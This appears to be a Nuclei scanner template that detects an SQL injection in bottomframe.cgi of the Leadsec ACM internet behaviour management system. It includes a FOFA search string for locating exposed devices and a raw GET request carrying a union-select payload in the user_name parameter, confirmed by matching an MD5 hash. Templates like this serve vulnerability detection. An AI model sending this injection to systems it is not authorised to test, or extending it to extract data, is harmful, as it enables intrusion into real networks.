id: leadsec-acm-bottomframe-cgi-sqli

info:
  name: 网御 ACM 上网行为管理系统bottomframe.cgi SQL 注入漏洞
  author: SleepingBag945
  severity: high
  description: |
    FOFA: app="网御星云-上网行为管理系统"
  tags: leadsec,sqli

http:
  - raw:
      - |
        GET /bottomframe.cgi?user_name=%27))%20union%20select%20md5(1)%23 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


    matchers-condition: and
    matchers:
      - type: word
        words:
          - c4ca4238a0b923820dcc509a6f75849b
        condition: and

      - type: status
        status:
          - 200